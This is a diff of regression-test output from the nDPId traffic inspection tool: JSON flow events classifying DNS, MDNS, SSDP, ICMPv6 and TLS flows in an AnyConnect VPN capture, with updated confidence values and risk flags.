-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687271764,"flow_last_seen":1569687271764,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":51382,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687251177,"flow_last_seen":1569687251230,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":54851,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247192,"flow_last_seen":1569687259297,"flow_idle_time":200000,"flow_min_l4_payload_len":232,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":464,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.213","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687246891,"flow_last_seen":1569687246924,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":121,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":63107,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261035,"flow_last_seen":1569687261054,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245251,"flow_last_seen":1569687245288,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":52879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687267677,"flow_last_seen":1569687268288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687286917,"flow_last_seen":1569687286919,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1569687246981,"flow_last_seen":1569687272376,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":2441,"flow_first_seen":1569687268746,"flow_last_seen":1569687289262,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1469,"flow_tot_l4_payload_len":789975,"flow_avg_l4_payload_len":323,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.102.91","src_port":54107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261486,"flow_last_seen":1569687261506,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57017,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1569687241656,"flow_last_seen":1569687287122,"flow_idle_time":140000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1920,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::2e7e:81ff:feb0:4aa1","dst_ip":"ff02::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1569687286917,"flow_last_seen":1569687286919,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":121,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1569687246981,"flow_last_seen":1569687272376,"flow_idle_time":200000,"flow_min_l4_payload_len":90,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":1070,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.213","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261485,"flow_last_seen":1569687261501,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":103,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59222,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687267477,"flow_last_seen":1569687267493,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57253,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687261034,"flow_last_seen":1569687261050,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687246924,"flow_last_seen":1569687246924,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1569687241422,"flow_last_seen":1569687286460,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":2200,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01148{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687245295,"flow_last_seen":1569687245320,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":121,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569687269716,"flow_last_seen":1569687269716,"flow_idle_time":200000,"flow_min_l4_payload_len":514,"flow_max_l4_payload_len":514,"flow_tot_l4_payload_len":514,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.149","dst_ip":"10.0.0.227","src_port":49816,"dst_port":57547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1569687267797,"flow_last_seen":1569687267821,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +01148{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1569687260591,"flow_last_seen":1569687262892,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":9167,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569687247596,"flow_last_seen":1569687248620,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip6","src_ip":"fe80::408:3e45:3abc:1552","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3001,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1569687289262,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 